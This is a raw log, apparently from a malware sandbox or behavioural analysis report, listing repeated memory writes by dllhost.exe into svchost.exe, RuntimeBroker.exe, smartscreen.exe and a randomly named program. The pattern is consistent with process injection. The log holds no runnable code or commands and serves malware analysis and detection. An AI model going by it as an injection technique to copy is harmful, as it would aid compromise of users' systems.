Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F02ED50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23014DD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 1B2E6AF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21744F70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 25A84C20000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 194A0710000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 1B2E6AF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AD4DDB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 25A84C20000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 1C0F4C90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 194A0710000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1F3A50F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AD4DDB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\smartscreen.exe base: 2164ACF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19985DA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1F3A50F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 23F7CDE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\smartscreen.exe base: 2164ACF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2EE94180000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19985DA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 23954370000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 23F7CDE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2EE94180000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 239543A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 292749D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1B9C9A20000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 292749D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1B9C9CB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 29F0AD90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 29F0ADC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1C585A50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1C585A80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2BEA4190000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2BEA41C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 430000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 450000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1380000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 13A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: B00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: B20000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: B40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: B60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: B40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: B60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1300000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1320000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 420000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 440000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1300000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1320000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1050000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1070000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 13D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 13F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1300000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1320000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 720000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 780000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: AD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: AF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: DC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: DE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: DD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: DF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 5C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 5E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 550000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 570000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: DE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: E00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 780000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 7A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1300000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1320000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1470000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1490000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: F70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: F90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1220000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1240000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1370000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1390000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1230000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1250000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: F40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: F60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 480000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 4A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: C30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: C50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1270000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1290000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 13D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 13F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: DB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: DD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: AB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: AD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: CD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: CF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 6F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 710000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: C60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: C80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: FA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: FC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: FD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: FF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: AE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: B00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1390000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 13B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: FD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: FF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 11D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 11F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: D80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: DA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 630000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 650000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1150000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1170000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1130000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1150000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: A20000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: A40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: D20000
